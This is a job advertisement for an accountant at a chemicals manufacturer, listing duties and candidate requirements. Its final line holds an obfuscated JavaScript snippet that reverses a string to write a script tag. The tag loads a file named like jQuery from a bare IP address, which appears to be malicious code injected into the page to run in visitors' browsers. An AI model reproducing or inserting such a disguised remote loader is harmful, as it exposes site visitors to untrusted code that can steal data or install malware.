Industry : Manufacturer of chemicals
– Prepare full set of accounts, management report and ad hoc financial analysis to help improve overall results of company.
– Ensure timely preparation and submission of Income Tax.
– Supervise Account Payable / Account Receivable daily works.
– Bank reconciliation.
– Perform data entry jobs. Ensure all entries taken up correctly before the month closing.
– Ensure all documents are filed accordingly & assist in any ad-hoc assignment as and when required.
– Liaise with customer, auditors, bankers, tax agents & operation staff.
– Ensure compliance with account, tax, statutory and legislative requirements as well as company policies.
– Preparing fixed asset schedule.
– To lead and manage stock take exercise.
– Candidate must possess at least a Professional Certificate, Diploma, Advanced/Higher/Graduate Diploma, or Bachelor’s Degree, in Finance, Accountancy or equivalent.
– At least 3 year(s) of working experience in accounting field.
– Team work player.
– Able to work independently under minimum supervision.
– Required skills : PC literate, Microsoft Office etc.
– Proficient in English, both written and spoken.
– Can start immediately is an advantage.
– Preferably those with experience in audit firm. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))